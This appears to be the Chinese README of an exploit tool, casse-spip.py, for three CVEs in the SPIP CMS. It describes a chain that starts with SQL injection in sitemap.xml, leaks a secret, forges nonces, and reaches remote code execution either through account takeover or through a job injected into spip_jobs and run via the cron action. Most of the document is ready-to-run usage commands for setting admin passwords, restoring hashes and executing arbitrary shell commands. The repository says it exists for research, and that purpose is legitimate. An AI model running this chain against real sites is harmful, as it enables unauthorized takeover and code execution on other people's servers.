针对 CVE-2026-72708、CVE-2026-72709 和 CVE-2026-72710 的漏洞利用程序,由 Franck Chevalier (Wayko) 发现
如需完整的技术深入分析,请阅读 Lexfo 博客上的完整文章。
本仓库仅供研究和防御性安全目的使用。 作者对滥用此信息不承担任何责任。
入口点是公共 sitemap.xml 页面中的 SQL 注入,用于泄露 alea_ephemere。
有了该密钥,就可以为匿名操作伪造有效的 nonce。
从那里有两条路径可导致 RCE:
action=editer_auteur 账户接管,然后从私有区域实现 RCE。action=editer_objet 批量赋值,向 队列写入一行,然后通过 执行它。spip_jobsaction=cronpython3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
在覆盖之前,--ato 会(通过 SQLi)导出目标的 login 和当前 pass 哈希,
以便之后可以用 --restore-hash 将其恢复:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
文件将被写入 IMG/casse-spip_<token>.html。